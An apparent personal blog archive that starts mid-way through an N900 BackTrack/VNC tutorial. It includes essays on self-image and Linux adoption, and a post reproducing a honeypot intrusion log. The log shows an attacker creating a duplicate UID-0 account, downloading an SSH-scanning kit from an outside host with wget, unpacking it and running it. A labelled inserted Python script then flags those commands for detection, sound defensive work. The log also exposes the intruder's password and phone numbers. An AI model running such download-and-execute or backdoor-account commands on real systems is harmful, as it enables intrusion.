  10. If you couldn’t guess this from the previous steps… run /usr/bin/startvnc. Errors are normal btw, we’re running Linux, remember?
  11. If you don’t already have one, you’ll need a vnc client. From a terminal window outside your BT5 chroot, try `apt-get install presencevnc`. It seems to work better for me than vncviewer. Run it, and connect to 127.0.0.1. Don’t forget to specify 5901 as your port, if it gives you trouble. Note, to use capital letters and symbols in the VNC client, you have to actually hold the shift/function key while you press the letter.
  12. Tada.
  13. Edit: Another point of interest. If you, as I did, begin to have problems with running out of memory, you’ll need to add a swap partition. It makes stuff go a lot smoother. I used gparted on my laptop to shrink my memory card’s ext3 partition down a bit and added a 2GB swap partition (overkill, but why not). Then you can either add it in /etc/fstab on your N900, or use the quick and dirty way of `swapon /dev/mmcblk1p2` or whatever your partition is. Run `free` to find out if it worked.
  14. Edit 2: Regarding the previous item, MarshmallowGoat pointed out in the comments that we can probably just use a swap file instead of creating a whole partition, something I hadn’t thought of. A how to is posted here – https://wiki.archlinux.org/index.php/Swap#Swap_file

I don’t think I missed anything, but if I did, lemme know and I’ll try to help.

I should also note that some of you will want to try extracting the .img straight to the file system and running it from there instead. That should be faster, but I haven’t tried it yet. It won’t require a lot of changes from these steps, but I don’t want to post any guides until if and when I’ve tried it myself. By that time, I expect someone else will have beaten me to it anyway.

Written by sequel7

May 15th, 2011 at 7:55 pm

Self-Image

with one comment

So yeah, it’s been awhile since I posted on this. I had all kinds of grand dreams for this blog, but it turns out I don’t trust the internet enough to share most of the things I would post, and I’m too busy right now to do anything strictly productive that I’m allowed to share. Insert promises of a one day renewed effort <here>. Frigging school, wasting all my time when I could be spending it learning things.

Anyway, on to the post itself. One of my assignments for school this week was to analyze a book and write a paper about it. What book it was is irrelevant, as is most of the paper I wrote. I am however going to copy a small section of it to here, as I was reasonably pleased with the way I said it. I feel it offers some potentially constructive insight into me as a person, and I hope that perhaps it can help others who maybe struggle with their own “self image”.



</blah blah blah boring paper blah blah blah>

During my childhood and up through nearly all of high school, I was the type of guy that was always mimicking the people I admired and respected. I was in many ways a shape shifter, with no true form or identity of my own. Every time my environment changed, be it from my family moving, or changing schools or churches, I would find a person I wanted to be like, and I would emulate them in nearly every way.

I would model my taste in music, hobbies, eventually vehicles, and almost everything else after whoever I looked up to at the time. Looking back on it, I find that I sometimes became more like the image of what I thought I wanted to be than my role models themselves were, if that makes any sense at all. Unfortunately, as was inevitable, each of these heroes eventually let me down. Sometimes this was their fault, sometimes it was my own, but regardless, the net effect was that I never felt secure in who I was. Everyone I wanted to be like turned out to be flawed.

Eventually, not long before I graduated high school a few years ago, I learned that it was better to just find out who I was, and be that person. It took work and experimentation, but I found things that I could ground myself in. I can look at me as a person and say these things are who I am. It helps me tremendously to be able to point at those parts of my identity, and I can hold on to them whenever anything else seems shaky. When I am laughed at for my quirks, I find that I can let it roll off of me, because I am actually comfortable with who I am.

By way of example, I wear nothing but straight black clothing all day of every day. Sure, occasionally I get laughed at for it, and lots of people give me odd looks when I walk down a sidewalk, but I like it, and it is part of my identity. Somehow having that part of me lets me not worry so much about other things, like if my hair looks stupid today or if I have a weird looking cold sore on my mouth.

Furthermore, I identify myself as a professional computer hacker and amateur StarCraft II enthusiast. I practice legally hacking computers so as to understand how they are vulnerable to evil hackers, so that I can better teach people how to fix them, and that makes me awesome. I also play StarCraft II, and am statistically among the top 8% of the four and a half million players worldwide, which also contributes to my awesomeness. Being anchored in these two things lets me never have to worry about not being good at anything else I might have worried about in the past, like being terrible at sports, or awful at math.

Most importantly, as of a couple years ago I have been able to identify myself as a husband. On days when nearly everything else seems meaningless, and no one else seems to be around, I can always ground myself in the fact that I have a wife to care for and who loves me. It’s hard to find something bad enough in the world to make you forget something like that.

<blah blah blah boring paper blah blah blah>


Written by sequel7

March 11th, 2011 at 11:11 pm

Posted in General

O RLY?

with 3 comments

It would appear that my first shot at a honeypot has been an amusing success :-)

www:~# w
13:27:54 up 14 days,  3:53,  1 user,  load average: 0.08, 0.02, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    77.28.252.122     13:27    0.00s  0.00s  0.00s w
www:~# ls
www:~# uptime
13:28:00 up 14 days,  3:53,  0 users,  load average: 0.08, 0.02, 0.01
www:~# wget
wget: missing URL
Usage: wget [OPTION]… [URL]…

Try `wget –help’ for more options.
www:~# cat /proc/cpuinfo
processor    : 0
vendor_id    : GenuineIntel
cpu family    : 6
model        : 23
model name    : Intel(R) Core(TM)2 Duo CPU     E8200  @ 2.66GHz
stepping    : 6
cpu MHz        : 2133.305
cache size    : 6144 KB
physical id    : 0
siblings    : 2
core id        : 0
cpu cores    : 2
apicid        : 0
initial apicid    : 0
fpu        : yes
fpu_exception    : yes
cpuid level    : 10
wp        : yes
flags        : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips    : 4270.03
clflush size    : 64
cache_alignment    : 64
address sizes    : 36 bits physical, 48 bits virtual
power management:

processor    : 1
vendor_id    : GenuineIntel
cpu family    : 6
model        : 23
model name    : Intel(R) Core(TM)2 Duo CPU     E8200  @ 2.66GHz
stepping    : 6
cpu MHz        : 2133.305
cache size    : 6144 KB
physical id    : 0
siblings    : 2
core id        : 1
cpu cores    : 2
apicid        : 1
initial apicid    : 1
fpu        : yes
fpu_exception    : yes
cpuid level    : 10
wp        : yes
flags        : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips    : 4266.61
clflush size    : 64
cache_alignment    : 64
address sizes    : 36 bits physical, 48 bits virtual
power management:

www:~# wget
wget: missing URL
Usage: wget [OPTION]… [URL]…

Try `wget –help’ for more options.
www:~# passwd
Enter new UNIX password: islamizacija54321
Retype new UNIX password: islamizacija54321
Sorry, passwords do not match
passwd: Authentication information cannot be recovered
passwd: password unchanged
www:~# passwd
Enter new UNIX password: islamizacija54321
Retype new UNIX password: islamizacija54321
Sorry, passwords do not match
passwd: Authentication information cannot be recovered
passwd: password unchanged
www:~# /usr/sbin/useradd -o -u 0 user
Adding user `user’ …
Adding new group `user’ (1001) …
Adding new user `user’ (1001) with group `user’ …
Creating home directory `/home/user’ …
Copying files from `/etc/skel’ …
Password: islamizacija54321
Password again: islamizacija54321

Changing the user information for test123
Enter the new value, or press ENTER for the default
Username []: serdzan
Full Name []: serdzan abdi
Room Number []: 1
Work Phone []: /
Home Phone []: /
Mobile Phone []: /
Country []: /
City []: /
Language []: /
Favorite movie []: /
Other []: /
Is the information correct? [Y/n] y
ERROR: Some of the information you entered is invalid
Deleting user `user’ …
Deleting group `user’ (1001) …
Deleting home directory `/home/user’ …
Try again? [Y/n] n
www:~# adduser
adduser: Only one or two names allowed.
www:~# adduser serdzan
Adding user `serdzan’ …
Adding new group `serdzan’ (1001) …
Adding new user `serdzan’ (1001) with group `serdzan’ …
Creating home directory `/home/serdzan’ …
Copying files from `/etc/skel’ …
Password: islamizacija54321
Password again: islamizacija54321

Changing the user information for test123
Enter the new value, or press ENTER for the default
Username []: hi
Full Name []: hhi
Room Number []: 2
Work Phone []: /
Home Phone []: +38970554214
Mobile Phone []: +35897052555
Country []: bulgaria
City []: sofia
Language []: english
Favorite movie []: 2012
Other []: noting
Is the information correct? [Y/n] y
ERROR: Some of the information you entered is invalid
Deleting user `serdzan’ …
Deleting group `serdzan’ (1001) …
Deleting home directory `/home/serdzan’ …
Try again? [Y/n] n
www:~# wget http://gblteam.webs.com/gosh.tgz.tar
–2010-04-08 13:39:02–  http://gblteam.webs.com/gosh.tgz.tar
Connecting to gblteam.webs.com:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1642769 (1M) [application/x-tar]
Saving to: `gosh.tgz.tar

100%[======================================>] 1,642,769    143K/s  eta 0s

2010-04-08 13:39:13 (143 KB/s) – `gosh.tgz.tar’ saved [1642769/1642769]
www:~# tar -zxvf gosh.tgz.tar
gosh
gosh/3
gosh/4
gosh/common
gosh/go.sh
gosh/scam
gosh/pscan2
gosh/ss
gosh/5
gosh/vuln.txt
gosh/1
gosh/mfu.txt
gosh/pass_file
gosh/gen-pass.sh
gosh/secure
gosh/2
gosh/ssh-scan
gosh/a
www:~# cd gosh
www:/root/gosh# touch bios.txt
bash: touch: command not found
www:/root/gosh# touch bios.txt
bash: touch: command not found
www:/root/gosh# chmod +x *
www:/root/gosh# ./go.sh 77
___
{o,o}
|)__)
-“-“-
O RLY?
___
{o,o}
|)__)
-“-“-
O RLY? y
___
{o,o}
(__(|
-“-“-
NO WAI!
www:/root/gosh# ./go.sh 77
___
{o,o}
|)__)
-“-“-
O RLY? yes
___
{o,o}
(__(|
-“-“-
NO WAI!
www:/root/gosh# ./go
bash: ./go: command not found
www:/root/gosh# ./go.sh
___
{o,o}
|)__)
-“-“-
O RLY? no
___
{o,o}
|)__)
-“-“-
O RLY? no
___
{o,o}
|)__)
-“-“-
O RLY? k
___
{o,o}
|)__)
-“-“-
O RLY? y
___
{o,o}
(__(|
-“-“-
NO WAI!
www:/root/gosh#
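
For defenders reviewing a capture like the one above, this added example (not part of the original post) parses a session in the same `www:<cwd>#` prompt format and tags each typed command. The rule labels and function names are this example's own, and `SESSION` is an excerpt abridged from the transcript.

```python
import re
import shlex

# Prompt format seen in the transcript above: "www:<cwd># <command>".
PROMPT = re.compile(r"^www:(?P<cwd>\S+?)# ?(?P<cmd>.*)$")

# (label, rule) pairs; labels are this example's own. Rules get (basename, argv).
RULES = [
    ("recon", lambda p, a: p in {"w", "who", "uptime"}
        or (p == "cat" and "/proc/cpuinfo" in a[1:])),
    ("credential-change", lambda p, a: p == "passwd"),
    # useradd -o permits a non-unique UID; with -u 0 the new account is a second root.
    ("duplicate-uid0-account", lambda p, a: p == "useradd" and "-o" in a
        and bool(re.search(r" (-u|--uid)[ =]0( |$)", " ".join(a)))),
    ("account-creation", lambda p, a: p in {"useradd", "adduser"} and len(a) > 1),
    ("tool-download", lambda p, a: p in {"wget", "curl"}
        and any(x.startswith(("http://", "https://", "ftp://")) for x in a[1:])),
    ("archive-unpack", lambda p, a: p == "tar" and len(a) > 1
        and bool(re.fullmatch(r"-?[A-Za-z]*x[A-Za-z]*", a[1]))),
    ("mark-executable", lambda p, a: p == "chmod" and "+x" in a[1:]),
    ("run-from-cwd", lambda p, a: a[0].startswith("./")),
]

def classify(argv):
    """Return every label whose rule matches this command."""
    prog = argv[0].rsplit("/", 1)[-1]
    return [label for label, rule in RULES if rule(prog, argv)]

def analyze(text):
    """Extract the commands typed at a prompt and label each one."""
    findings = []
    for line in text.splitlines():
        m = PROMPT.match(line.strip())
        if not m or not m["cmd"].strip():
            continue  # program output, interactive answers, or an empty prompt
        try:
            argv = shlex.split(m["cmd"])
        except ValueError:  # unbalanced quotes in what was typed
            argv = m["cmd"].split()
        findings.append({"cwd": m["cwd"], "argv": argv, "labels": classify(argv)})
    return findings

def download_then_execute(findings):
    """True when a remote download is later followed by running a local file."""
    downloaded = False
    for f in findings:
        if "tool-download" in f["labels"]:
            downloaded = True
        elif downloaded and "run-from-cwd" in f["labels"]:
            return True
    return False

# Abridged from the transcript above; most program output is omitted.
SESSION = """\
www:~# w
www:~# cat /proc/cpuinfo
www:~# passwd
passwd: password unchanged
www:~# /usr/sbin/useradd -o -u 0 user
www:~# adduser
www:~# adduser serdzan
www:~# wget http://gblteam.webs.com/gosh.tgz.tar
www:~# tar -zxvf gosh.tgz.tar
www:~# cd gosh
www:/root/gosh# chmod +x *
www:/root/gosh# ./go.sh 77
O RLY? y
www:/root/gosh#
"""

if __name__ == "__main__":
    for f in analyze(SESSION):
        print(f["cwd"], " ".join(f["argv"]), "->", ", ".join(f["labels"]) or "-")
    print("download then execute:", download_then_execute(analyze(SESSION)))
```

Lines that do not start with the prompt, such as the `O RLY?` answers, are treated as output rather than commands, so only what was typed at the shell is classified.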

Written by sequel7

April 8th, 2010 at 2:49 pm

Posted in Hacking

Protected: Engraven

without comments

Written by sequel7

April 7th, 2010 at 10:44 am

Posted in Poetry

Another exercise in Thought

with one comment

So I’ve been reading Brave New World, about half way through right now. It’s interesting so far, fairly good, not really fantastic. It’s neat that the guy predicted so much of the mindset of so many of today’s people so long ago, but it’s not really very useful. That leaves only the story as a reason to read the book, and again, so far it’s fairly good but not all that epic. Anyway, none of that is the point.

One of the main ideas of the book is that mankind has organized itself into a rigid society, where each member is a tiny part of the greater whole. No one single person is really very important, or even truly understands the rest of the system, he only does his part and doesn’t ask questions. Of course, this would be a disturbing world to live in, yada yada yada. The point is that the entire planet has really formed itself into a single greater organism, much as our own cells all work together mindlessly to form the greater organism that is a human being.

Now my thought is this: Imagine if the greater organism that is Earth in the book were to send colonists to settle another planet. It would look much like a human cell dividing to form another cell. Now imagine this happening until there were so many colonized worlds formed into their own planet sized organisms, that they themselves began to form into a greater organism, perhaps encompassing a galaxy. And then what if that galactic organism began to reproduce itself and repeat the cycle again? Can you imagine what that would look like? Then think of it in reverse as well. We have no awareness of our blood cells as individual cells, but imagine if they themselves had once been the largest organism that had existed.

Just something I found to be a rather interesting chain of thought.

PS: I played Left 4 Dead 2 (never played the first) and Aliens vs Predator (since the new one came out) over the weekend. Zomg, I have been missing out. I also discovered that I am amazing as an alien. Furthermore, Just Cause 2 apparently came out while I wasn’t looking, so I played a few hours of it too. You have got to check this game out, it’s like a beautiful combination of GTA’s gameplay and sandbox with a bit of Spiderman’s powers on the side. Just ignore the god awful voice acting.

Written by sequel7

March 29th, 2010 at 3:47 pm

Why Linux isn’t taking over the desktop, really.

with one comment

Every year, we have a thousand different websites claiming that this time it really is the Year of the Linux Desktop. Every year Fedora and Ubuntu put out two full major releases, often with big improvements to their distribution, not to mention all the other distributions that I don’t care enough about to know their release schedule. Linux, in its better forms, has gotten to the point of being at least as user friendly as Windows, and certainly lighter on your machine. It still has its problems in its own areas, but Windows certainly has more than its own share of user-unfriendliness. So why hasn’t Linux taken a larger hold on the desktop? I believe the answer to that question lies with the Linux users, and their friends and family.

Consider this. All of us either know or are that “Computer Guy” that a dozen or more friends and family members have on speed dial to call up and ask the silliest questions about what they’ve broken on their Windows box this week. It’s an accepted way of life, and most of us don’t really mind that much. Most of those Computer Guys actually started as one of those friends or family members, and in the process of bugging a Computer Guy learned enough to become one themselves.

The problem is that Linux Computer Guys know that the pool of other Linux Computer Guys is much smaller than the pool of Windows Computer Guys. We know that the moment we start really teaching people we know to use Linux, every single person we teach is going to ask us every single one of their questions. As it stands, if someone can’t get one Windows Guy to help them, they can just call their backup Windows Guy (and don’t act like you don’t have a mental hierarchy, we know better). On the other hand, most people don’t even know one Linux Guy, much less two or three.

Now as I said earlier, I don’t think there would really be very many, if any, more issues with any given person using Linux instead of Windows, the problem is that there would be a great many more persons calling their given Linux guy with their issues. Not many of us actually have the time or the patience to give out that kind of free labor, so not many of us really try to get people to use Linux. We talk a big game on forums, IRC, and amongst each other, but that rubber never hits the proverbial road. It can’t, unless someone figures out how to turn being The Computer Guy into a full time paying job. Friends and family tend to balk at the concept of paying for labor, which is okay when we can just pass them on to the next Guy when we’re busy, but that only works when there is a next Guy.

I honestly believe that’s the real problem. Thoughts on the solution?

Written by sequel7

February 2nd, 2010 at 8:53 am

Posted in Linux

Protected: Hark

without comments

Written by sequel7

January 31st, 2010 at 1:52 pm

Posted in Poetry

Exercise in Thought

with 3 comments

So imagine for me if you will, that there actually exist an infinite number of parallel universes.

Wikipedia has a somewhat less than perfectly clear definition of the term ‘parallel universe’, but I’ll explain the basics for anyone who isn’t familiar. Basically the idea is that there are an infinite number of alternate realities, that have branched in an infinite number of ways since the beginning of time. Every single thing that could ever have happened differently in our universe, actually has happened in a parallel universe. The alternate realities range from anything as similar to this one as a reality where you ate something different for breakfast this morning, to a reality where you never existed, due to an ancient ancestor of yours having died before having children. Again, the idea is that there is an infinite number of ways the universe could have played out, and every such possibility exists in a universe somewhere.

Okay, so now that we’ve made that assumption for the sake of this exercise in thought, we can move on.

I was thinking to myself this afternoon, and I realized what alternate universe I would want to live in. Somewhere, in some universe, due to the infinite number of events playing out, there would be a universe in which an entire physics system is false. Somewhere, there would be a bunch of people who believe in something like magic, or the force, because every time they point a magic wand or wave their hands, something spontaneously combusts. In reality, it would be a series of impossible coincidences, but because of the infinite possible universes, there would have to be at least one universe where something coincidentally exploded every single time someone pointed a stick at it.

That universe would be awesome.

Written by sequel7

November 21st, 2009 at 4:20 pm

Posted in Random Thoughts